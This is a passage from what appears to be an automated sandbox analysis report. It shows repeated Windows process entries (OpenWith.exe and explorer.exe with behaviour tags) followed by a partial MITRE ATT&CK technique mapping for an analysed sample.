C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4660

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:4712

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:1840

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:1560

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:3668

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:4652

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4436

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:2620

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:100

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4796

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:4416

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4108

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:316

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:2880

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:1588

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4652

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:4216

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:1408

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:816

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:5080

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:4312

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:2884

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:4892

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:2312

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:700

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:2740

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:3104

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:1712

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:1812

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:3540

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:3252

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:3116

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:4876

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4816

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:1220

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:2416

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:4376

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:456

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:2476

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4816

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:4992

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:5052

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:1636

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:3348

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:4712

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4640

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery